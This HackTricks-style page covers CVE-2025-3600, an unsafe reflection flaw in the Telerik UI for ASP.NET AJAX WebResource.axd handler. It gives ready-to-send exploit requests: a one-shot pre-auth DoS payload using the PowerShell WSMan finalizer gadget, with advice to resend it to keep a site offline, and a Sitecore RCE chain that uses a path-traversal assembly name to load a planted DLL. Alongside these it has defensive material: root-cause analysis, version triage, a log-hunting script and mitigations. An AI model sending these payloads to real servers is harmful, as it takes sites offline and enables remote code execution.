Telerik UI for ASP.NET AJAX – Unsafe Reflection via WebResource.axd (type=iec)
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Browse the full HackTricks Training catalogue for the assessment paths (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group, follow @hacktricks_live on X/Twitter, or check out the LinkedIn page and YouTube channel.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Pre-auth constructor execution in the Telerik UI for ASP.NET AJAX Image Editor cache handler enables a universal DoS and, in many applications, pre-auth RCE through target-specific gadgets (CVE-2025-3600).
TL;DR
- Affected component/route: Telerik.Web.UI.WebResource.axd with query type=iec (Image Editor cache handler). Exposed pre‑auth in many products.
- Primitive: the attacker controls the type name (prtype). The handler resolves it with Type.GetType() and invokes Activator.CreateInstance() before verifying interface type-safety, so any public parameterless .NET type constructor will run.
- Impact:
- Universal pre‑auth DoS with a .NET framework gadget (PowerShell WSMan finalizer).
- Often elevates to pre‑auth RCE in real deployments by abusing app‑specific gadgets, especially insecure AppDomain.AssemblyResolve handlers.
- Fix: Update to Telerik UI for ASP.NET AJAX 2025.1.416+ or remove/lock the handler.
Affected versions
- Telerik UI for ASP.NET AJAX versions 2011.2.712 through 2025.1.218 (inclusive) are vulnerable.
- Fixed in 2025.1.416 (released 2025-04-29). Patch immediately or remove/lock down the handler.
Affected surface and quick discovery
- Check exposure:
- GET /Telerik.Web.UI.WebResource.axd should return something other than 404/403 if the handler is wired.
- Inspect web.config for handlers mapping to Telerik.Web.UI.WebResource.axd.
- Do not rely on finding Telerik strings on / or login pages. Real products such as Sitecore often expose the handler without referencing it in the default HTML.
- Reaching the vulnerable code path requires type=iec, dkey=1, and a non-empty prtype.
Example probe and generic trigger:
```http
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=Namespace.Type, Assembly
```
Notes
- Some PoCs use dtype; the implementation checks dkey=="1" for the download flow.
- prtype must be assembly-qualified or otherwise resolvable in the current AppDomain.
Key code/ops checks
```xml
<!-- system.web -->
<add path="Telerik.Web.UI.WebResource.axd" type="Telerik.Web.UI.WebResource" verb="*" validate="false" />
<!-- system.webServer -->
<add name="Telerik_Web_UI_WebResource_axd" path="Telerik.Web.UI.WebResource.axd" type="Telerik.Web.UI.WebResource" verb="*" preCondition="integratedMode" />
```
```bash
rg -n 'Telerik\.Web\.UI\.WebResource\.axd|Telerik\.Web\.UI\.WebResource' web.config **/*.config
curl -skI https://target/Telerik.Web.UI.WebResource.axd
curl -sk 'https://target/Telerik.Web.UI.WebResource.axd?type=iec'
```
Quick version triage on legacy installs
If the same application also exposes the legacy type=rau handler, the old Telerik tooling can still help you determine the bundled Telerik.Web.UI.dll version before attempting type=iec research. This does not exploit CVE-2025-3600 directly; it only relies on the fact that rau and iec live in the same assembly.
Practical use:
- If type=rau is reachable, use the classic major-version brute-force from the old RAU tools to obtain the exact Telerik.Web.UI assembly version.
- Compare the recovered version against the vulnerable range (2011.2.712 to 2025.1.218) and the fixed build (2025.1.416+).
- Treat the absence of type=rau as inconclusive. iec may still be exposed even when rau is disabled or filtered.
Example with the old CVE-2019-18935.py tool:
```bash
for YEAR in $(seq 2011 2025); do
  echo -n "$YEAR: "
  python3 CVE-2019-18935.py -t -v "$YEAR" -p /dev/null \
    -u 'https://target/Telerik.Web.UI.WebResource.axd?type=rau' 2>/dev/null |
    grep -oE "Telerik.Web.UI, Version=$YEAR\\.[0-9\\.]+" || echo
done
```
Why this helps:
- Enterprise applications often bundle Telerik versions that have sat untouched for years.
- Red teams can quickly separate "handler exposed" from "likely still on a vulnerable DLL".
- During incident response, the same approach helps scope large IIS estates when file-system access is not immediately available.
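As an added triage helper (not code from the original page, Telerik or watchTowr), the following Python parses the per-year output of the brute-force loop above and classifies each recovered version against the ranges stated on this page; the sample output lines are constructed, and the verdict names are this example's own.

```python
import re

# Range from the advisory: 2011.2.712 .. 2025.1.218 (inclusive) vulnerable, 2025.1.416 fixed.
VULN_MIN = (2011, 2, 712)
VULN_MAX = (2025, 1, 218)
FIXED = (2025, 1, 416)

# Matches the "Telerik.Web.UI, Version=YYYY.M.BBB[.R]" string the RAU tooling prints.
_VERSION_RE = re.compile(r"Telerik\.Web\.UI,\s*Version=(\d+)\.(\d+)\.(\d+)")


def parse_telerik_version(text):
    """Return (year, major, build) from a 'Telerik.Web.UI, Version=...' string, or None if absent."""
    m = _VERSION_RE.search(text)
    return tuple(int(g) for g in m.groups()) if m else None


def triage(text):
    """Classify one brute-force result line against the CVE-2025-3600 version ranges."""
    v = parse_telerik_version(text)
    if v is None:
        return "inconclusive"  # no rau match: iec may still be exposed, so never mark this as safe
    if VULN_MIN <= v <= VULN_MAX:
        return "vulnerable"
    if v >= FIXED:
        return "patched"
    return "review"  # outside the documented range (very old or an unexpected build): check manually


def triage_brute_force_output(lines):
    """Walk the loop's per-year output ('YEAR: <match or empty>') and return {year: verdict}."""
    verdicts = {}
    for line in lines:
        year, _, rest = line.partition(":")
        verdicts[year.strip()] = triage(rest)
    return verdicts


# Constructed sample output, shaped like the loop above prints it (not real scan data).
SAMPLE_OUTPUT = [
    "2019: ",
    "2020: Telerik.Web.UI, Version=2020.1.114.45",
    "2025: Telerik.Web.UI, Version=2025.1.416.0",
]

if __name__ == "__main__":
    for year, verdict in triage_brute_force_output(SAMPLE_OUTPUT).items():
        print(year, verdict)
```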
Root cause – unsafe reflection in ImageEditorCacheHandler
The Image Editor cache download flow instantiates the type supplied in prtype and only afterwards casts it to ICacheImageProvider and validates the download key. The constructor has already executed by the time validation fails.
Relevant decompiled flow
```csharp
// entrypoint
public void ProcessRequest(HttpContext context)
{
    string text = context.Request["dkey"];                        // dkey
    string text2 = context.Request.Form["encryptedDownloadKey"];  // download key
    ...
    if (this.IsDownloadedFromImageProvider(text)) // effectively dkey == "1"
    {
        ICacheImageProvider imageProvider = this.GetImageProvider(context); // instantiation happens here
        string key = context.Request["key"];
        if (text == "1" && !this.IsValidDownloadKey(text2))
        {
            this.CompleteAsBadRequest(context.ApplicationInstance);
            return; // cast/check happens after ctor has already run
        }
        using (EditableImage editableImage = imageProvider.Retrieve(key))
        {
            this.SendImage(editableImage, context, text, fileName);
        }
    }
}

private ICacheImageProvider GetImageProvider(HttpContext context)
{
    if (!string.IsNullOrEmpty(context.Request["prtype"]))
    {
        return RadImageEditor.InitCacheImageProvider(
            RadImageEditor.GetICacheImageProviderType(context.Request["prtype"]) // [A]
        );
    }
    ...
}

public static Type GetICacheImageProviderType(string imageProviderTypeName)
{
    return Type.GetType(string.IsNullOrEmpty(imageProviderTypeName)
        ? typeof(CacheImageProvider).FullName
        : imageProviderTypeName); // [B]
}

protected internal static ICacheImageProvider InitCacheImageProvider(Type t)
{
    // unsafe: construct before enforcing interface type-safety
    return (ICacheImageProvider)Activator.CreateInstance(t); // [C]
}
```
Exploit primitive: a controlled type string → Type.GetType resolves it → Activator.CreateInstance runs its public parameterless constructor. Even if the request is rejected afterwards, the gadget's side effects have already occurred.
## Universal DoS gadget (no app-specific gadgets required)
Class: System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper in System.Management.Automation (PowerShell) has a finalizer that closes an uninitialized handle, raising an unhandled exception when the GC finalizes the object. This reliably crashes the IIS worker process shortly after instantiation.
One‑shot DoS request:
```http
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35
```
Notes
- Keep sending it periodically to keep the site offline. You may see the constructor hit in a debugger; the crash occurs during finalization.
From DoS to RCE – escalation patterns
Unsafe constructor execution opens up many target-specific gadgets and chains. Look for:
- Parameterless constructors that process attacker input
- Some ctors (or static initializers) immediately read the Request query/body/cookies/headers and (de)serialize them.
- Example (Sitecore): a ctor chain reaches GetLayoutDefinition(), which reads the HTTP body "layout" and deserializes it as JSON via JSON.NET.
- Constructors that touch files
- Ctors that load or deserialize config/blobs from disk can be coerced if you can write to those paths (uploads/temp/data folders).
- Constructors performing app-specific ops
- Resetting state, swapping modules, or killing processes.
- Constructors/static ctors that register AppDomain event handlers
- Many apps add AppDomain.CurrentDomain.AssemblyResolve handlers that build DLL paths from args.Name without sanitization. If you can influence type resolution, you can force arbitrary DLL loads from attacker-controlled paths.
- Forcing AssemblyResolve via Type.GetType
- Request a type that does not exist to trigger CLR resolution and invoke the registered (possibly insecure) resolvers. Example assembly-qualified name:
This.Class.Does.Not.Exist, watchTowr
- Finalizers with destructive side effects
- Some types delete fixed-path files in their finalizers. Combined with link-following or predictable paths, this can enable local privilege escalation in certain environments.
Example pre-auth RCE chain (Sitecore XP)
- Step 1 – Pre-auth: trigger a type whose static/instance ctor registers an insecure AssemblyResolve handler (e.g., Sitecore's FolderControlSource in ControlFactory).
- Step 2 – Post-auth: obtain write access to a resolver-probed directory (e.g., via an auth bypass or a weak upload) and drop a malicious DLL.
- Step 3 – Pre-auth: use CVE-2025-3600 with a non-existent type and an assembly name containing traversal to force the resolver to load the planted DLL → code execution as the IIS worker.
Trigger examples
```http
# Load the insecure resolver (no auth on many setups)
GET /-/xaml/Sitecore.Shell.Xaml.WebControl
# Coerce the resolver via Telerik unsafe reflection
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=watchTowr.poc,+../../../../../../../../../watchTowr
```
Verification, hunting and DFIR notes
- Safe lab verification: send the DoS payload and watch for an app pool restart / unhandled exception attributed to the WSMan finalizer.
- Hunting in telemetry:
- Requests to /Telerik.Web.UI.WebResource.axd with type=iec and odd prtype values.
- Failed type loads and AppDomain.AssemblyResolve events.
- Sudden w3wp.exe crashes/restarts following such requests.
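As an added hunting example (not code from the original page or from any vendor), the following Python walks IIS W3C log lines, keeps only type=iec requests to the handler, and ranks the prtype value using the two indicators this page describes (the WSMan DoS gadget and traversal in the assembly part); the log sample is constructed and the category labels are this example's own.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log sample for demonstration (not real telemetry); spaces appear as '+' as IIS logs them.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-05-01 10:00:01 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation 203.0.113.7 500
2025-05-01 10:00:02 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=iec&dkey=1&prtype=watchTowr.poc,+../../../../../../../../../watchTowr 203.0.113.7 400
2025-05-01 10:00:03 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=iec&dkey=1&prtype=This.Class.Does.Not.Exist,+watchTowr 203.0.113.7 400
2025-05-01 10:00:04 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd _TSM_HiddenField_=x&compress=1 198.51.100.2 200
2025-05-01 10:00:05 10.0.0.5 GET /index.aspx - 198.51.100.2 200
"""

HANDLER = "/telerik.web.ui.webresource.axd"
DOS_GADGET = "WSManPluginManagedEntryInstanceWrapper"


def classify_prtype(prtype):
    """Rank a decoded prtype value: the known DoS gadget, a traversal in the assembly part, or anything else."""
    if DOS_GADGET in prtype:
        return "dos-gadget"
    if "../" in prtype or "..\\" in prtype:
        return "assembly-traversal"
    return "unexpected-prtype"


def hunt_iec_requests(log_text):
    """Return (client_ip, status, category, prtype) for every type=iec request in an IIS W3C log."""
    fields, hits = None, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the records that follow
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-uri-stem", "").lower() != HANDLER:
            continue
        # parse_qs decodes both percent-encoding and the '+' IIS writes for spaces
        q = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
        if q.get("type", [""])[0].lower() != "iec":
            continue
        prtype = q.get("prtype", [""])[0]
        # type=iec without prtype does not reach the attacker-controlled Type.GetType path
        category = classify_prtype(prtype) if prtype else "iec-default"
        hits.append((rec.get("c-ip"), rec.get("sc-status"), category, prtype))
    return hits


if __name__ == "__main__":
    for hit in hunt_iec_requests(SAMPLE_LOG):
        print(*hit)
```

Correlate the returned client IPs and timestamps with w3wp.exe crash/restart events to confirm whether a flagged request preceded a worker crash.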
Mitigation
- Install the Telerik UI for ASP.NET AJAX 2025.1.416 or later patch.
- Remove or restrict exposure of Telerik.Web.UI.WebResource.axd where possible (WAF/rewrites).
- Ignore or harden server-side handling of prtype (update so that the proper checks run before instantiation).
- Review and harden custom AppDomain.AssemblyResolve handlers. Avoid building paths from args.Name without sanitization; use strong-named loading or a whitelist.
- Lock down and minimize upload/write locations and prevent DLL drops into probed directories.
- Monitor attempts to load non-existent types to detect resolver abuse.
Quick guide
- Presence check:
- GET /Telerik.Web.UI.WebResource.axd
- Check the handler mapping in web.config
- Exploit skeleton:
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=<TypeName,+Assembly,+Version=..., +PublicKeyToken=...>
- Universal DoS:
...&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35
- Resolver trigger:
This.Class.Does.Not.Exist, watchTowr
Related techniques
- IIS post-exploitation, .NET key extraction, and in-memory loaders:
IIS - Internet Information Services
- ASP.NET ViewState deserialization and machineKey abuses:
Exploiting __VIEWSTATE without knowing the secrets
References
- Progress Telerik – Unsafe Reflection Vulnerability (3600)
- watchTowr labs – More than DoS: Progress Telerik UI for ASP.NET AJAX Unsafe Reflection (CVE-2025-3600)
- Black Hat USA 2019 – SSO Wars: The Token Menace (Mirosh & Muñoz) – DoS gadget background
- ZDI – Abusing arbitrary file deletes to escalate privilege
- watchTowr – Is “B” for Backdoor? (Sitecore chain CVE-2025-34509)